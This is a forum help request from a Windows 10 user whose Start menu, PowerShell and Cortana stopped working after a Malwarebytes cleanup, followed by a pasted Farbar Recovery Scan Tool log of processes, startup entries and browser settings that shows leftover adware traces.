
Start Menu/Cortana/PowerShell Win 10 won't run after Malwarebytes clean



I downloaded Malwarebytes to get rid of a popup issue that I started having in the last week. It was able to find and delete things that had merely been quarantined in the past. I am considering a subscription as Windows Defender needs the backup.

 

However, I have now discovered that after running Malwarebytes my machine is not working properly, with no access to the Windows 10 start up menu (you can left click for the control panel controlled, but the regular click does nothing). In addition, PowerShell does not complete loading and Cortana will not respond.

Actions I have already taken:

  • Restarted the computer
  • Restarted explorer.exe
  • I tried to use the Windows utility to check and repair all services - it found a few that it could not repair, but they appeared to all be display images. I attached the items that were flagged in a document.
  • I restored my computer to a point two months ago before my viral problems and before antimalware and everything worked well.
  • Viral popups started immediately and this one Windows Defender found them but could not correct.
  • Re-downloaded and ran Malwarebytes and this time researched all the things that it suggested I delete (especially those in Windows files) and deleted all that were suggested.
  • Unfortunately, same problem reoccurred and I cannot access the start menu/PowerShell/Cortana
  • I ran Farbar Recovery and attached the logs below.

 

Remaining Malware issue:  m77.dnsqa.me  

 

 

 

I originally ran AdwCleaner before Malwarebytes, but did not have this problem before doing that AND I did not rerun it after my system restore.

I attached the log from my first time around deleting all that was recommended. Oddly enough there is NOT a log for when I did the same thing yesterday. If you look at the Malwarebytes logs it is like the system restore never happened and I did not redownload the program.

My computer: Windows 10 Home, Toshiba Satellite m630

 

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by Lexi (administrator) on DURABLE (08-03-2016 12:22:47)
Running from C:\Users\Lexi\Downloads
Loaded Profiles: Lexi (Available Profiles: Lexi & DefaultAppPool)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Edge)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RTKAUDIOSERVICE64.EXE
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(LeapFrog Enterprises, Inc.) C:\Program Files (x86)\LeapFrog\LeapFrog Connect\CommandService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Amazon.com) C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientService.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.3.198\ccSvcHst.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.3.198\ccSvcHst.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\SmoothView\SmoothView.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\Teco.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\SmartFaceV\SmartFaceVWatcher.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\BulletinBoard\TosNcCore.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe
() C:\Program Files\TOSHIBA\FlashCards\Hotkey\TCrdKBB.exe
(FileThis) C:\Program Files (x86)\FileThis\FileThis Fetch\FileThis Fetch.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(Amazon.com) C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientSystemTray.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe
(Audible, Inc.) C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe
(TOSHIBA CORPORATION.) C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe
(PFU LIMITED) C:\Program Files (x86)\PFU\ScanSnap\CardMinder\CardLauncher.exe
(Orbiscom Ltd. All rights reserved.) C:\Program Files (x86)\Discover\SOAN\DiscoverSOAN.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(PFU LIMITED) C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsMon.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe
(Amazon Digital Services, LLC.) C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\AmazonCloudDrive.exe
(Orbiscom Ltd.) C:\Windows\SysWOW64\OBroker.exe
(LeapFrog Enterprises, Inc.) C:\Program Files (x86)\LeapFrog\LeapFrog Connect\Monitor.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\Brmfcmon\BrMfimon.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\ControlCenter3\BrccMCtl.exe
(LG Electronics) C:\ProgramData\LGMOBILEAX\BYR_Client\VZWUAAgent.exe
(Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(PFU LIMITED) C:\Program Files (x86)\PFU\ScanSnap\SSFolder\SSFolderTray.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Sun Microsystems, Inc.) C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\LocalServiceJre\bin\AmazonCloudDriveW.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHWMsg.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Farbar) C:\Users\Lexi\Downloads\FRST64 (1).exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [16174328 2015-09-28] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1411840 2015-09-28] (Realtek Semiconductor)
HKLM\...\Run: [ThpSrv] => C:\windows\system32\thpsrv /logon
HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [505696 2009-11-06] (TOSHIBA Corporation)
HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [52600 2009-03-09] (TOSHIBA Corporation)
HKLM\...\Run: [smoothView] => C:\Program Files\Toshiba\SmoothView\SmoothView.exe [508216 2009-07-28] (TOSHIBA Corporation)
HKLM\...\Run: [00TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [913720 2010-03-25] (TOSHIBA Corporation)
HKLM\...\Run: [Teco] => C:\Program Files\TOSHIBA\TECO\Teco.exe [1489760 2010-04-06] (TOSHIBA Corporation)
HKLM\...\Run: [TosWaitSrv] => C:\Program Files\TOSHIBA\TPHM\TosWaitSrv.exe [705368 2010-02-23] (TOSHIBA Corporation)
HKLM\...\Run: [smartFaceVWatcher] => C:\Program Files\Toshiba\SmartFaceV\SmartFaceVWatcher.exe [238080 2009-10-19] (TOSHIBA Corporation)
HKLM\...\Run: [TosVolRegulator] => C:\Program Files\TOSHIBA\TosVolRegulator\TosVolRegulator.exe [24376 2009-11-11] (TOSHIBA Corporation)
HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe [709976 2010-02-05] (TOSHIBA Corporation)
HKLM\...\Run: [TosNC] => C:\Program Files\Toshiba\BulletinBoard\TosNcCore.exe [595816 2010-03-19] (TOSHIBA Corporation)
HKLM\...\Run: [TosReelTimeMonitor] => C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe [35672 2010-03-03] (TOSHIBA Corporation)
HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3944648 2015-06-12] (Synaptics Incorporated)
HKLM-x32\...\Run: [KeNotify] => C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe [34160 2009-12-25] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [HWSetup] => C:\Program Files\TOSHIBA\Utilities\HWSetup.exe [423936 2010-03-04] (TOSHIBA Electronics, Inc.)
HKLM-x32\...\Run: [sVPWUTIL] => C:\Program Files (x86)\TOSHIBA\Utilities\SVPWUTIL.exe [352256 2010-02-22] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [TWebCamera] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe [2454840 2010-02-24] (TOSHIBA CORPORATION.)
HKLM-x32\...\Run: [TSleepSrv] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe [252728 2010-03-17] (TOSHIBA)
HKLM-x32\...\Run: [NortonOnlineBackupReminder] => C:\Program Files (x86)\TOSHIBA\Toshiba Online Backup\Activation\TobuActivation.exe [529256 2009-08-10] (Toshiba)
HKLM-x32\...\Run: [secure Online Account Numbers] => C:\Program Files (x86)\Discover\SOAN\DiscoverSOAN.exe [376832 2010-03-05] (Orbiscom Ltd. All rights reserved.)
HKLM-x32\...\Run: [brMfcWnd] => C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe [1159168 2009-05-26] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [ControlCenter3] => C:\Program Files (x86)\Brother\ControlCenter3\brctrcen.exe [114688 2008-12-24] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [scanSnap WIA Service Checker] => C:\windows\SSDriver\fi5110\SsWiaChecker.exe
HKLM-x32\...\Run: [Monitor] => C:\Program Files (x86)\LeapFrog\LeapFrog Connect\Monitor.exe [118272 2014-07-11] (LeapFrog Enterprises, Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2011-07-05] (Apple Inc.)
HKLM-x32\...\Run: [bYRUA_AGENT] => C:\ProgramData\LGMOBILEAX\BYR_Client\VZWUAAgent.exe [380024 2012-09-24] (LG Electronics)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1085656 2015-12-13] (Adobe Systems Incorporated)
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer: [NoSetActiveDesktop] 0
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [GoogleChromeAutoLaunch_AC2BF96DE3E4AFDBE25411FD527B2AD1] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [874648 2016-03-01] (Google Inc.)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [FileThis Fetch] => C:\Program Files (x86)\FileThis\FileThis Fetch\FileThis Fetch.exe [350208 2013-05-24] (FileThis)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Policies\Explorer: [NoSetActiveDesktop] 0
AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC64Loader.dll => No File
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Amazon Unbox.lnk [2012-12-12]
ShortcutTarget: Amazon Unbox.lnk -> C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientSystemTray.exe (Amazon.com)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Audible Download Manager.lnk [2010-09-24]
ShortcutTarget: Audible Download Manager.lnk -> C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe (Audible, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CardMinder Viewer.lnk [2011-07-19]
ShortcutTarget: CardMinder Viewer.lnk -> C:\Program Files (x86)\PFU\ScanSnap\CardMinder\CardLauncher.exe (PFU LIMITED)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Conversion to PDF with ScanSnap Organizer.lnk [2011-07-19]
ShortcutTarget: Conversion to PDF with ScanSnap Organizer.lnk -> C:\Program Files (x86)\PFU\ScanSnap\Organizer\PfuSsOrgOcrChk.exe (PFU LIMITED)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ScanSnap Manager.lnk [2013-05-28]
ShortcutTarget: ScanSnap Manager.lnk -> C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsMon.exe (PFU LIMITED)
Startup: C:\Users\Lexi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Amazon Cloud Drive.lnk [2016-03-07]
ShortcutTarget: Amazon Cloud Drive.lnk -> C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\AmazonCloudDrive.exe (Amazon Digital Services, LLC.)
Startup: C:\Users\Lexi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EvernoteClipper.lnk [2015-07-31]
ShortcutTarget: EvernoteClipper.lnk -> C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{0377792b-7629-45e2-ae76-3047b41ccf06}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{69348f7a-a204-4307-bdbe-d51a41143651}: [DhcpNameServer] 10.0.5.3 10.0.5.2
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com/ig/redirectdomain?brand=TSNA&bmod=TSNA
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Start Page Restore = hxxp://www.google.com/calendar/render?hl=en&tab=wc&gsessionid=pOBMFiDq2Uvgtsn9Tik9KQ
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://www.facebook.com/
hxxps://www.google.com/calendar/render?hl=en&tab=wc&pli=1&gsessionid=OK
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.google.com/ie
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com/ie
SearchScopes: HKLM -> DefaultScope {60C66211-88F6-486E-8303-B0B10E4FD293} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA
SearchScopes: HKLM -> {60C66211-88F6-486E-8303-B0B10E4FD293} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA
SearchScopes: HKLM-x32 -> DefaultScope {B1243C39-DE64-4E02-BC80-265B7BD496B1} URL = 
SearchScopes: HKLM-x32 -> {9D2BF1CD-96EB-4EA4-9D12-EEAA66D4FC8D} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {23758B0B-0D9F-32A3-A476-D9B1033E7A1E} URL = hxxp://www.bing.com/search?q={searchTerms}&pc=ZUGO&form=ZGAIDF
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = 
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {57A65587-8AEC-4FF9-A3A3-32330322F26B} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA_enUS393US394
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {60C66211-88F6-486E-8303-B0B10E4FD293} URL = 
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?q={SEARCHTERMS}&o=15527&l=dis&prt=360&chn=retail&geo=US&ver=4
BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll [2013-07-29] (Oracle Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll [2013-07-29] (Oracle Corporation)
BHO-x32: Secure Online Account Numbers Helper -> {435EAA86-D32B-484F-869C-53745FCB1642} -> C:\Program Files (x86)\Discover\SOAN\DiscoverSOANHelper.dll [2010-03-05] (Orbiscom Ltd. All rights reserved.)
BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\ssv.dll [2012-05-04] (Oracle Corporation)
BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2014-12-17] (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
BHO-x32: Skype Plug-In -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\jp2ssv.dll [2012-05-04] (Oracle Corporation)
BHO-x32: Google Gears Helper -> {E0FEFE40-FBF9-42AE-BA58-794CA7E3FB53} -> C:\Program Files (x86)\Google\Google Gears\Internet Explorer\0.5.36.0\gears.dll [2010-02-23] (Google Inc.)
BHO-x32: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll [2010-03-19] (<TOSHIBA>)
Toolbar: HKLM-x32 - Secure Online Account Numbers - {A8C7C2CA-6DFD-4E16-8458-592361564D38} - C:\Program Files (x86)\Discover\SOAN\DiscoverSOANToolbar.dll [2010-03-05] (Orbiscom Ltd. All rights reserved.)
Toolbar: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
Toolbar: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> No Name - {A13C2648-91D4-4BF3-BC6D-0079707C4389} -  No File
DPF: HKLM-x32 {2FF8D282-F78A-4A33-ABC2-49E72A341482} hxxp://riteaid.storefront.com/images/global/activex/SFImageUpload1_10.CAB
DPF: HKLM-x32 {C7DEDA04-2FFF-4B81-AE66-0A0E0EF4AD2F} hxxp://www.ritzpix.com/net/Uploader/LPUploader57.cab
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
 
FireFox:
========
FF ProfilePath: C:\Users\Lexi\AppData\Roaming\Mozilla\Firefox\Profiles\s9ln76d7.default-1398562510049
FF NewTab: about:newtab
FF DefaultSearchEngine: Search Provided by Yahoo
FF DefaultSearchEngine.US: Google
FF SelectedSearchEngine: Search Provided by Yahoo
FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/_freaudedtr_16_04&param1=1&param2=f%3D1%26b%3DFirefox%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_306.dll [2016-02-10] ()
FF Plugin: @java.com/DTPlugin,version=10.25.2 -> C:\windows\system32\npDeployJava1.dll [2013-07-29] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.25.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2013-07-29] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_306.dll [2016-02-10] ()
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2013-01-11] (Foxit Corporation)
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin-x32: @java.com/DTPlugin,version=10.25.2 -> C:\windows\SysWOW64\npDeployJava1.dll [2013-07-29] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.5.1 -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\plugin2\npjp2.dll [2012-05-04] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MIF5BA~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MIF5BA~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-09-23] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-12-17] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2574262253-2623044021-4024016403-1001: amazon.com/AmazonMP3DownloaderPlugin -> C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin1017300.dll [2012-08-28] (Amazon.com, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPcol400.dll [2010-12-14] (Catalina Marketing Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPcol500.dll [2010-12-14] (Catalina Marketing Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2015-06-29] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll [2011-08-24] (Apple Inc.)
